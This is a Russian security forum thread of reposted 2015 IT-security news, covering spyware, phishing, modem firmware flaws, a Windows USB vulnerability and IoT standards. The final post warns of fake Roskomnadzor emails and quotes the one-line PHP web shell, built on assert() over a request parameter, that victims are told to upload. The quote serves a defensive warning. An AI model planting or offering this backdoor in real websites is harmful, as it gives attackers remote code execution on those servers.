Загрузка...

Вернуться   Другой Форум про антивирусы и софт - Norton, Касперский, ESET, Windows > Безопасность системы > Обсуждение антивирусов и файерволов
Войти через профиль в соц. сети
Регистрация Справка Правила Помощь форуму Пользователи Календарь Статистика Все разделы прочитаны
Обсуждение антивирусов и файерволов Обсуждения и сравнения антивирусных программ и файерволов, раздел допускает наличие флуда и свободного общения в рамках приличия

Ответ
Старый 05.08.2015, 08:43   #921
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума

IT-безопасность-свежие новости.


Большинство разработчиков выпускают приложения с уязвимостями

Большинство разработчиков выпускают приложения с известными уязвимостями. Как сообщает «Лаборатория Касперского», об этом пишет Help Net Security со ссылкой на новое исследование, проведенное Prevoty.

В результате анонимного онлайн-опроса аналитики изучили мнение более 200 разработчиков софта в июне 2015 года. Опрошены были мужчины и женщины, проживающие в США, старше 18 лет.

Согласно результатам исследования, разработчики обычно решают вопросы безопасности своих предложений в последнюю очередь. Порядка 79% компаний выпускают софт с заранее известными уязвимостями. Несмотря на то, что на разработку приложений выделяются миллионы долларов, компании по-прежнему инвестируют недостаточно в критический компонент софта – защиту против атак.

Целых 70% компаний отметили, что в интересах бизнеса быстро выпустить приложение, даже если это будет в ущерб безопасности. При этом 80% разработчиков все же волнуются по поводу того, что клиенты не будут доверять их продуктам, если в них обнаружатся проблемы, связанные с безопасностью. Почти половина разработчиков также созналась, что в течение 80% своего времени они выпускают приложения с уязвимостями.

Источник
__________________
  Ответить с цитированием
Загрузка...
Re: IT-безопасность-свежие новости.
Старый 05.08.2015, 16:58   #922
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Эксперты продемонстрировали, как агенты спецслужб взламывают мобильные телефоны

Шпионский инструмент позволяет получить доступ практически к любым данным на телефоне, планшете или ПК.

Как правило, шпионские техники, используемые спецслужбами для взлома мобильных телефонов, редко становятся достоянием общественности. Однако специалист ИБ-компании 4Armed Джо Гринвуд (Joe Greenwood) продемонстрировал журналистам телеканала BBC, каким образом работает один такой инструмент из арсенала компании Hacking Team. Напомним, некоторое время назад неизвестные взломали корпоративную сеть итальянского разработчика и похитили 400 ГБ данных, в том числе электронную переписку, рабочие документы и исходные коды ПО. Похищенный архив хакеры опубликовали в Сети в свободном доступе.

Данный инструмент (его название не разглашается) позволяет получить доступ практически к любым данным, хранящимся на телефоне, планшете или ПК, делать снимки и осуществлять запись разговоров без ведома владельца устройства.

Когда Джо Гринвуду на глаза попался исходный код шпионского инструмента, специалист не удержался от экспериментов с ним. ПО состоит из консоли, на которой отображаются данные, изъятые из взломанного устройства, и вредоносной программы, предназначенной для инфицирования целевого гаджета.

По словам Гринвуда, возможности инструмента включают загрузку файлов, использование микрофона для записи разговоров, отслеживание работающих программ, получение доступа к списку контактов на устройстве и перехват звонков Skype. Помимо того, шпионское ПО содержит функции для отслеживания биткоин-транзакций.

Выявить слежку можно несколькими способами. К примеру, внезапное увеличение объема передачи данных может свидетельствовать о том, что информация отправляется еще куда-либо. Как отметил Гринвуд, в настоящее время, шпионским ПО инфицируются, скорее всего, только мобильные телефоны и компьютеры ключевых целей спецслужб.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 05.08.2015, 17:00   #923
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

RSA: Сети VPN-оператора Terracotta используются для проведения правительственных кибератак

Исследователи рассказали об устройстве недобросовестного китайского сервиса в ходе конференции Black Hat 2015.

Китайский VPN-сервис Terracotta, предоставляющий услуги анонимизации на коммерческой основе, по данным исследователей из RSA, используется для организации кибератак. По словам специалистов, среди прочего эта служба используется в качестве программного инструмента местными правительственными хакерами.

Согласно докладу RSA, опубликованного организаторами Black Hat 2015, Terracotta регулярно захватывает контроль над различными серверами в целях расширения собственной сети. При этом официально компания предоставляет частным лицам коммерческие услуги по обеспечению защиты от правительственной слежки.

По данным ведущего исследователя RSA Кента Бекмана (Kent Backman), не так давно в отношении компьютерных сетей неназванного оборонного подрядчика были предприняты попытки проведения хакерских атак и фишинговых кампаний. При этом злоумышленники маскировали вредоносный трафик при помощи узла связи Terracotta, принадлежащего легитимной, но никак не связанной с участниками инцидента компании.

Бекман отметил, что администраторы сети, скрывавшей активность злоумышленников, не подозревали, что их системы используются для проведения атаки. Вероятнее всего, по словам эксперта, организация не хранила данные, требующие надежной защиты, и потому не следила за своевременным обновлением важного ПО, что сделало сеть уязвимой и позволило хакерам использовать ее в неправомерных целях.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 09.08.2015, 21:16   #924
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.


Банк России предупредил о новой фишинговой кампании


Центральный банк Российской Федерации (Банк России)
Пресс-служба


107016, Москва, ул. Неглинная, 12
www.cbr.ru
Информация
О рассылке фишинговых email-сообщений

Банк России зафиксировал случаи рассылки email-сообщений, содержащих недостоверную информацию о запуске национальной платежной системы «Мир».

Подобные сообщения содержат описание возможностей платежной системы «Мир» и предложение получить карты данной платежной системы, заполнив форму участника, находящуюся во вложении. При этом имеющийся во вложении исполняемый код позволяет злоумышленникам загружать на компьютер клиента вредоносное программное обеспечение различной направленности.

Фишинговые email-сообщения рассылаются от имени крупных кредитных организаций. При этом адрес отправителя email-сообщения по признакам может принадлежать существующей кредитной организации. В то же время одна из отличительных особенностей таких email-сообщений — перечисление в тексте заведомо большого количества преимуществ данной платежной системы, в том числе прямого доступа к криптовалютам.

Подобного рода email-рассылки Банк России расценивает как новый вид мошенничества.

Банк России призывает граждан — получателей таких фишинговых сообщений не открывать содержащиеся в них вложения и не пересылать их, а также предлагает кредитным организациям довести данную информацию до своих клиентов.

При получении подобных email-сообщений Банк России рекомендует гражданам ставить об этом в известность клиентскую службу кредитной организации, от лица которой получено сообщение.

Кредитным организациям Банк России рекомендует сообщать о подобных случаях в Центр мониторинга и реагирования на компьютерные атаки в кредитно-финансовой сфере.

7 августа 2015 года

При использовании материала ссылка на Пресс-службу Банка России обязательна.

Пресс-центр
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 10.08.2015, 16:21   #925
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Эксперты: Встроенные LTE/3G модемы могут использоваться хакерами для повторного заражения ОС

В процессе получения обновлений для прошивки отсутствует механизм проверки криптографической подписи.

Встроенные в ноутбуки и планшеты LTE/3G модемы могут стать мишенью для хакеров, которые ищут лазейки, позволяющие им установить вредоносное ПО на целевую систему и получить к ней постоянный доступ.

В ходе конференции DEF CON, проходившей в Лас-Вегасе, исследователи Intel Мики Шкатов (Mickey Shkatov) и Джесси Майкл (Jesse Michael) продемонстрировали, как злоумышленник при помощи установленного на компьютере вредоносного ПО может переписать прошивку модуля популярного LTE-модема Huawei, установленного в значительном количестве устройств.

Модуль работает под управлением ОС на базе Linux, полностью независимой от основной операционной системы компьютера, пишет интернет-портал NetworkWorld. Система модуля подключена к компьютеру через внутренний USB-интерфейс, позволяющий эмулировать клавиатуру, мышь, драйвер CD-ROM, сетевую карту или другой USB-девайс.

Главная проблема, по словам специалистов, заключается в том, что в процессе получения обновлений для прошивки отсутствует механизм проверки криптографической подписи. Это позволило исследователям создать вредоносный образ прошивки, который мог быть записан на утилиту обновлений для ОС Windows, установленную производителем.

В случае успешной атаки злоумышленник сможет повторно инфицировать главную ОС, даже если она была переустановлена. Более того, преступник может модифицировать прошивку таким образом, что все последующие запросы на обновления будут проигнорированы. Таким образом, у пользователя не будет иного способа избавиться от проблемы, кроме как разобрать ноутбук или планшет и заменить инфицированный модуль.

По словам экспертов, компания Huawei осведомлена о проблеме и уже исправила ее, реализовав в своих модулях механизм безопасной загрузки.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 10.08.2015, 18:35   #926
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Функцию Facebook можно использовать для получения доступа к данным

ИБ-эксперт смог получить доступ к тысячам учетных записей Facebook, используя настройку приватности.

Используя настройку приватности, установленную в социальной сети Facebook по умолчанию, ИБ-исследователь Реза Моайандин (Reza Moaiandin) смог привязать тысячи номеров телефонов к учетным записям в Facebook. Злоумышленники могут повторить данную схему и скомпрометировать данные еще большего количества людей для того, чтобы в дальнейшем продать их на нелегальном рынке. Об этом сегодня, 10 августа, сообщило издание The Guardian.

По данным издания, речь идет о настройке «Кто может меня найти?», в которой по умолчанию выбрана опция «Все» во всех профилях Facebook. Это означает, что любой пользователь, вводящий номер телефона интересующего человека, может найти его, так как последний имеет учетную запись в Facebook, в которой указан его номер телефона.

Реза Моайандин использовал алгоритм для генерации тысяч номер телефонов и затем с помощью интерфейса прикладного программирования Facebook получил доступ к данным учетных записей.

Пользователи могут сделать две вещи для того, чтобы избежать атаки. Прежде всего, следует выбрать опцию, не разрешающую привязывать телефонный номер к учетной записи Facebook. Второй вариант – изменить настройку указанной выше функции и выбрать опцию «только друзья».

По словам Моайандина, он дважды связывался с представителями Facebook после обнаружения такой возможности. Тем не менее, исследователь получил ответ, что компания контролирует ситуацию.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 14.08.2015, 11:13   #927
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Microsoft: Злоумышленники эксплуатируют уязвимость в Windows с помощью USB

Атакующий может повысить свои привилегии и выполнить вредоносный код на целевой системе.

Microsoft в рамках «вторника обновлений» предупредила пользователей о том, что злоумышленники с помощью USB-устройств эксплуатируют уязвимость в продукте компании, позволяющую выполнить вредоносный код. Брешь затрагивает все поддерживаемые версии ОС Windows.

Уязвимость существует из-за того, что компонент Mount Manager некорректно обрабатывает символические ссылки. Локальный злоумышленник может повысить свои привилегии и выполнить код. Для того чтобы проэксплуатировать уязвимость, атакующему необходимо подключить вредоносное USB-устройство к целевой системе.

Данная брешь CVE-2015-1769 очень напоминает уязвимость .LNK, которую в прошлом эксплуатировали создатели Stuxnet, отмечает ИБ-исследователь Пьерлуиджи Паганини (Pierluigi Paganini). Единственное различие между брешами заключается в том, что эксплуатировать первую можно только локально с помощью вредоносных USB-устройств, а вторую - удаленно.

Компания Microsoft полагает, что данная брешь эксплуатируется злоумышленниками в кибератаках на пользователей продуктов компании. Устранить уязвимость можно, установив обновления с сайта производителя.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 20.08.2015, 18:45   #928
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Брюс Шнайер: В киберпространстве ведется холодная война

Самым тяжелым для ИБ-исследователей является определение источника кибератаки.

На конференции LinuxCon 2015 известный ИБ-специалист Брюс Шнайер (Bruce Schneier) заявил, что в настоящее время в киберпространстве ведется своего рода холодная война, однако, к сожалению, не всегда понятно, кто против кого воюет. По словам Шнайера, обеспечить кибербезопасность становится все сложнее, а киберугрозы - все опаснее.

«Мы знаем, что злоумышленники имеют преимущество в Сети. У опытных, мотивированных и хорошо финансируемых хакеров всегда все получается. Поэтому мы должны выяснить, как с ними справиться», - призывает Шнайер.

На примере громкой кибератаки на компанию Sony Pictures в ноябре прошлого года ИБ-эксперт демонстрирует, что многие из подобных нападений сто процентов были профинансированы правительствами государств. «Многие из нас, включая и меня, скептически отнеслись к предположениям о финансовой поддержке атаки на Sony Pictures. Однако, как бы это не удивительно звучало, стало очевидным то, что нападение было осуществлено Северной Кореей», - рассказал Шнайер.

Самым тяжелым для ИБ-исследователей, отметил Шнайер, является определение источника кибератаки, так как процесс осуществления новых нападений может кардинально отличаться от того, чего ожидали эксперты. По мнению Шнайера, целью атаки на Sony Pictures являлась не инфраструктура компании, а сам факт возможности осуществить масштабное нападение на крупнейшую американскую компанию и в частности причинить урон всем США.

Благодаря различным программам выплат вознаграждений осуществления кибератак становится менее выгодным для злоумышленников. Однако, когда дело касается правительственного финансирования, ИБ-компании не могут конкурировать, отметил Шнайер.

Злоумышленники делают все возможное, чтобы запутать специалистов. Очень часто оказывается, что атака была осуществлена совершенно из другой страны, чем из той, которую якобы удалось определить в ходе предотвращения нападения. Нередко хакеры делают так, чтобы эксперты думали, что источник атаки находится в Китае, просто потому, что данную страну постоянно подозревают в кибернападениях.

«Очень часто ИБ-исследователи не в состоянии определить, осуществлялась ли атака хорошо профинансированной государством группой хакеров или простыми ребятами со штаб-квартирой в подвале. Непонятно, когда нападение должно быть делом полиции, а когда вопросом национальной безопасности.», - сообщил Шнайер.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 21.08.2015, 18:35   #929
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Эксперт предложил установить стандарты безопасности для «Интернета вещей»

Многие разработчики «умных» вещей прекращают существование до того, как окончится жизненный цикл их продукции.

Главный технический архитектор компании Tenable Network Security Дик Бюссье (Dick Bussiere) считает, что «Интернету вещей» необходимы базовые стандарты безопасности. К такому выводу специалист пришел после посещения одной из электростанций. Как выяснилось, все процессы находились под контролем компьютера, работавшего под управлением значительно устаревшей операционной системы Windows 2000 Server.

Тем не менее, подобная ситуация Бюссье не удивила, поскольку в мире «Интернета вещей» все элементы обладают более длительным жизненным циклом.

«Как вы определяете «Интернет вещей»? Мое определение звучит следующим образом: вещь – это любая компьютерная платформа, обладающая нетрадиционным интерфейсом», - рассказал специалист в интервью интернет-порталу ZDNet.

Согласно этой формулировке, смартфон, так же, как и настольный ПК, является традиционным интерфейсом, поскольку сконструирован для непосредственного взаимодействия с человеком, который управляет им в реальном времени. Однако устройства на электростанции, контролируемые архаичным сервером, таковыми не являются.

Все эти вещи, устаревшие, как электростанции, или более современные, как «умные» автомобили или холодильники, служат годами, что вызывает опасения специалистов. Прежде всего, тревожит вопрос, кто будет поддерживать эти устройства на протяжении всего жизненного цикла. Во многих случаях компании-разработчики «умных» вещей прекращают свое существование и больше не могут осуществлять поддержку продукции.

«Нужен стандартизованный метод, гарантирующий, что подключенный к интернету аппарат, который вы внедряете в свою сеть, соответствует базовым стандартам безопасности. Особенно это касается элементов, являющихся частью систем жизнеобеспечения, таких как автомобили или медицинские приборы», - отметил Бюссье.

Источник
__________________
  Ответить с цитированием
Re: IT-безопасность-свежие новости.
Старый 28.08.2015, 08:23   #930
# Куратор #
 
Аватар для VSpicin

 
Регистрация: 23.05.2012
Адрес: MsK
Сообщений: 7 967

VSpicin вне форума
По умолчанию Re: IT-безопасность-свежие новости.

Злоумышленники рассылают поддельные письма от Роскомнадзора, угрожая блокировкой

От имени ведомства мошенники требуют у администраторов сайтов разместить на своих серверах вредоносный файл.

Как стало известно, злоумышленники запустили вредоносную кампанию якобы от имени Роскомнадзора. 25-26 августа нынешнего года администраторы доменных имен в зоне .ru получили электронную рассылку, подписанную ведомством. В письмах, отправленных с адреса [Ссылки могут видеть только зарегистрированные пользователи. ], сказано, что получатель должен разместить на сервере файл с названием reestr-id198617.php, который необходим для его идентификации в качестве администратора доменного имени.

Похоже на то, что мошенники решили воспользоваться ажиотажем вокруг внесения в реестр запрещенных сайтов и дальнейшего исключения из него «Википедии» за статью о наркотическом веществе. Поскольку блокировка ресурса в РФ осуществляется по решению суда, в фальшивых письмах от Роскомнадзора злоумышленники также ссылаются на судебное постановление, а точнее, на решение Новокуйбышевского городского суда Самарской области.

В письме идет речь о том, что аудитория сайта, администратором которого является потенциальная жертва, насчитывает свыше трех тысяч человек в сутки. В связи с этим получатель письма должен идентифицировать себя как администратора сайта. Для этого необходимо создать в корневой директории ресурса папку reestr, а в ней – файл reestr-id198617.php с текстом:

<?php

/*Подтверждение доменного имени www.ХХХХХ.ru*/

assert(stripslashes($_REQUEST[roskomnadzor]));?>

Отметим, что функция assert выполняет вредоносные инструкции.

В случае невыполнения «решения суда» в течение 72 часов с момента получения письма сайту грозит блокировка на территории РФ.

Источник
__________________
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
iSpy (безопасность дома, офиса...) Igoranama Другие программы - free version 111 15.03.2017 13:12
Новости кино DolphinDаrk Кино, Видео и ТВ 265 13.11.2016 08:33
Anvide Flash Lock ( Безопасность / Защита данных ) masteroleg Другие программы - free version 1 17.09.2015 16:23
LockXLS - безопасность Microsoft Excel rekc Офисные программы 2 10.12.2013 12:32
Правила раздела "Безопасность системы" creator Правила раздела 0 18.01.2011 20:49


Часовой пояс GMT +3, время: 07:15.




Загрузка...
Яндекс.Метрика